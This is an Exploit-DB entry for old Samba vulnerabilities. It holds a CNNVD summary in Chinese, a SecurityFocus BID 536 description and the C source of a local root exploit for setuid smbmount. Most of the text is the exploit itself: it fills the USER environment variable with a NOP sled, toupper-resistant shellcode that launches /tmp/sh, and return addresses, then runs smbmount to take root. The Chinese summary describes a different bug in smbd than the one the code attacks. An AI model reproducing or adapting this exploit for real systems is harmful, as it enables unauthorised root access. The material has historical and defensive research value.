https://www.exploit-db.com/exploits/19428
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199907-027

Sambasmbd程序中存在缓冲区溢出漏洞，可以借助一条畸形的消息命令导致该漏洞。

/*
source: http://www.securityfocus.com/bid/536/info

There were a number of vulnerabilities in the Samba package pre-2.0.5. The first is a possible denial of service in nmbd (the netbios name service daemon), which resulted in nmbd spinning until killed. The second vulnerability known is a possible buffer overflow problem in smbd which is not exploit in the default install/configuration. A function in the messaging system could be exploited and arbitrary code executed as root if the "message command" was set in smb.conf. There was also a race condition vulnerability which could possible allow an attacker to mount arbitrary points in the filesystem if smbmnt was setuid root (which it is not by default).
*/

/*
The default parameters to the program
often work, however I have found that the offset parameter sometimes
varies wildly, values between -600 and -100 usually work though, a quick
shell script will scan through these.
*/

/*
** smbexpl -- a smbmount root exploit under Linux
**
** Author: Gerald Britton <[email protected]>
**
** This code exploits a buffer overflow in smbmount from smbfs-2.0.1.
** The code does not do range checking when copying a username from
** the environment variables USER or LOGNAME.  To get this far into
** the code we need to execute with dummy arguments of a server and a
** mountpoint to use (./a in this case).  The user will need to create
** the ./a directory and then execute smbexpl to gain root.  This code
** is also setup to use /tmp/sh as the shell as bash-2.01 appears to
** do a seteuid(getuid()) so /bin/sh on my system won't work.  Finally
** a "-Q" (an invalid commandline argument) causes smbmount to fail when
** parsing args and terminate, thus jumping into our shellcode.
**
** The shellcode used in this program also needed to be specialized as
** smbmount toupper()'s the contents of the USER variable.  Self modifying
** code was needed to ensure that the shellcode will survive toupper().
**
** The quick fix for the security problem:
**          chmod -s /sbin/smbmount
**
** A better fix would be to patch smbmount to do bounds checking when
** copying the contents of the USER and LOGNAME variables.
**
*/

#include <stdlib.h>
#include <stdio.h>

#define DEFAULT_OFFSET                 -202
#define DEFAULT_BUFFER_SIZE             211
#define DEFAULT_ALIGNMENT                 2
#define NOP                            0x90

/* This shell code is designed to survive being filtered by toupper() */

char shellcode[] =
        "xebx20x5ex8dx46x05x80x08x20x8dx46x27x80x08x20x40"
        "x80x08x20x40x80x08x20x40x40x80x08x20x40x80x08x20"
        "xebx05xe8xdbxffxffxff"
        "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
        "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
        "x80xe8xdcxffxffxff/tmp/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int alignment=DEFAULT_ALIGNMENT;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);
  if (argc > 3) alignment = atoi(argv[3]);
  printf("bsize=%d offset=%d alignment=%dn",bsize,offset,alignment);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.n");
    exit(0);
  }

  addr = get_sp() - offset;
  fprintf(stderr,"Using address: 0x%xn", addr);

  ptr = buff;
  addr_ptr = (long *) (ptr+alignment);
  for (i = 0; i < bsize-alignment; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  ptr = buff + (128 - strlen(shellcode));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '';

  setenv("USER",buff,1);
  execl("/sbin/smbmount","smbmount","//a/a","./a","-Q",0);
}

来源:BID
名称:536
链接:http://www.securityfocus.com/bid/536